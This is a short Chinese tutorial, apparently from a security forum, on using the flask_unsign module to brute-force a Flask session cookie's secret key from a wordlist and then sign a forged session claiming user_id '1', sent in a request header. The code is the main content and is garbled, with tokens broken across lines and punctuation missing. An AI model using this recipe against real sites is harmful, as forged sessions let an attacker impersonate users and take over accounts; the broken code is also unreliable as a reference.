作者:破符
有些web交互中的cookie是加密的,flask_unsign 模块的作用是字典爆破加密cookie的密钥。
python
-
m pip install flask_unsign
m pip install flask_unsign_wordlist
from
flask_unsign
import
Cracker
logger,DEFAULT_WORDLIST
crack
=
Cracker(value
cookie,salt
DEFAULT_SALT,threads
8
)
with wordlist (DEFAULT_WORDLIST) as iterator:
crack.crack(iterator)
if
crack.secret:
logger.success(f
'Found secret key after {crack.attempts} attempts'
session1
ascii(crack.secret)
#如果session1有结果,则该值为爆破出来的私钥
session
sec_session
session.sign(value
"{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"
,secret
session1,)
#secret若无特殊要求,值应为爆破cookie生成的session1
#sec_session值为cookie可添加入header头部
顺便提供一下交互用的头部,注意sec_session为新生成的cookie
{
'User-Agent'
:
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36'
,
"Cookie"
"session="
+
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
